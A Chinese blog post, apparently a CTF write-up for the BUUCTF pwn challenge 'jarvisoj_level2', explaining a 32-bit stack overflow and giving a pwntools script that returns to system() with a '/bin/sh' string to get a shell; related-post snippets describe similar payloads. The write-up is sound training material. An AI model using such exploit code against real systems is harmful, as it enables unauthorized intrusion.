jarvisoj_level2

最新推荐文章于 2024-07-12 15:53:09 发布

_Nickname

最新推荐文章于 2024-07-12 15:53:09 发布

阅读量329

点赞数 3

分类专栏： Pwn buuctf 文章标签：安全 ctf pwn

加油加油~

本文链接：https://blog.csdn.net/wcj126/article/details/139890897

版权

buuctf 同时被 2 个专栏收录

20 篇文章 1 订阅

订阅专栏

Pwn

7 篇文章 1 订阅

订阅专栏

首先检查checksec

可以看见no canary found

说明可能是栈溢出

运行一下程序

随便输一个,得到hello world(感觉这一步好像没啥用,没有RE那用)

IDA 32 打开

后门

漏洞点

buf:

代码思路:利用溢出,把buf填满,然后构造程序,得到获取shell的目的

exp来自

BUUCTF—jarvisoj_level2 - 予柒 - 博客园 (cnblogs.com)

from pwn import*

r=remote('node5.buuoj.cn',27695)
shell_addr=0x804a024
system=0x8048320
payload=b'a'*(0x88+4)+p32(system)+p32(6)+p32(shell_addr)
r.sendline(payload)
r.interactive()

这里解释一下代码

payload就是溢出,然后p32 就是调用system,然后后面紧跟着就是p32(6),这个你随便填都行

因为32构造就是地址+下一次返回地址+参数

只是格式需要

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

_Nickname

关注关注

3
点赞
踩
2

收藏

觉得还不错? 一键收藏
打赏
0
评论
jarvisoj_level2

栈溢出构造(函数)从而得到shell
复制链接

扫一扫

专栏目录

CALIPSO_READERS_L2_Level2_5km_calipso_

10-02

标题“CALIPSO_READERS_L2_Level2_5km_calipso_”指的是NASA的CALIPSO（Cloud-Aerosol Lidar and Infrared Pathfinder Satellite Observation）卫星数据的第二级（Level 2）5公里分辨率的读取器。描述中提到的“nasa...

Low_Level_IO

02-11

2020年计算机体系结构和汇编语言组合项目阅读Proj6_Morrowj2.asm以获得代码该程序获取10个带符号的32位整数，进行验证并将其从ASCII转换为SDWORD，然后在转换回ASCII以及求和和舍入平均后，显示SDWORDS数组。

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF jarvisoj_level2 题解

qq_51802916的博客

08-20

310

可以看到程序中已经有了shell的字符串，由于是32位程序，函数的参数通过压栈传递，因此我们可以直接将其地址放在system之后就能够完成参数的传递。而不是使用call指令，因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址，因此我们需要在这个地方随便填入一些值，然后在后面填入函数的第一个参数。，因此我们需要填充0x88个字符就能到达ebp的位置，然后再填充4个字符就能到达eip的位置，并且。可以看到是32位程序，栈上开启了不可执行保护，但是没有栈检测标志，推测需要进行缓冲区溢出。

BUUCTF jarvisoj_level2

leesinalps的博客

12-01

108

可以看出利用的是格式化字符串的漏洞，需要我们修改var地址往下数第十四个，类似是数组的结构到var[13]为17，并且为LL就是long long int八个字节，，相当于64位的数据'\x11\x00\x00\x00\x00\x00\x00\x00'。如果用户输入的数据超出了数组的大小，就会覆盖内存中的其他数据，这可能导致不可预测的错误或者潜在的攻击。总之，这段代码的主要问题在于它没有进行充分的输入验证和保护，因此容易受到输入数据的恶意滥用，可能会导致安全漏洞。：这一行定义了一个名为。

jarvisoj_level2_x64[BUUCTF]

moonlightsunshin的博客

05-04

266

32位中参数都是保存在栈上，但在64位中的前六个参数依次保存在RDI，RSI，RDX，RCX，R8和 R9中，如果还有更多的参数的话才会保存在栈上。read函数存在溢出同时发现有/bin/sh所以我们思路就是构造溢出到/bin/sh,但是由于是64位的程序在函数调用时与32位不同。由32位变成了64位。payload的组成无用数据+pop rdi+函数参数+函数调用地址/bin/sh+函数返回地址system。回到这道题 64位会依次传函数返回地址,函数参数,函数调用地址,

jarvisoj_level2_x64

zip471642048的博客

06-24

550

题目地址 : https://buuoj.cn/challenges#jarvisoj_level2_x64 /bin/sh字符串 exp

[buuctf]jarvisoj_level2

逆向萌新的博客

06-19

484

[buuctf]jarvisoj_level2

jarvisoj_level2【BUUCTF】

qq_41696518的博客

08-26

662

jarvisoj_level2【BUUCTF】

jarvisoj_level2解题

suyuany的博客

02-04

317

payload=b'a'*(0x88+0x4)+p32(sys_addr)+p32(可为任意数值)+p32(binsh)双击点开vulnerable_function（）

buuctf之jarvisoj_level2

weixin_54452942的博客

04-11

527

buuctf--pwn

jarvisoj_level2[BUUCTF]

moonlightsunshin的博客

05-09

166

从反汇编后的代码可以看出read()这个函数对buf进行写入时存在缓冲区溢出，IDA会告诉我们buf数组与ebp在栈上的相对位置，即&buf=$ebp-0x88，因此我们需要填充0x88个字符就能到达ebp的位置，然后再填充4个字符就能到达eip的位置，并且system()的地址可以轻松在plt表中找到，为0x08048320，因此我们只需要在构造一个shell路径的字符转就可以getshell了。

Level_Set.zip_level set_level-set_set

07-15

这个"Level Set.zip_level set_level-set_set"压缩包文件包含了一个名为"Level_Set.m"的MATLAB程序，用于执行Level Set算法。 Level Set方法的核心思想是将图像中的边界或形状表示为一个零水平集（level set）函数...

level_set_image.rar_level set_level set 方程

09-21

2. 定义速度场：根据特定的图像特征（如梯度、色彩、纹理等）和能量函数，计算φ函数应该移动的速度。 3. 求解Level Set方程：使用有限差分或者数值积分的方法，更新φ函数的值，模拟其随时间的演化。 4. 重构边界：...

3D_LevelSet 2_levelset_forwardweh_3Dlevelset_

10-02

《3D LevelSet方法在3D医学图像分割中的简单实现》在计算机视觉与医学成像领域，3D LevelSet方法是一种广泛应用于图像分割的重要技术。该方法通过数学上的水平集理论，对复杂的三维图像进行精确分割，尤其适用于...

移动互联安全扩展要求测评项

hakksjss的博客

07-10

1012

应为无线接入设备的安装选择合理位置，避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当，易被攻击者利用，特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击，因此要选择合理的位置安装无线接入设备。

车载视频监控管理方案：无人驾驶出租车安全出行的保障

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交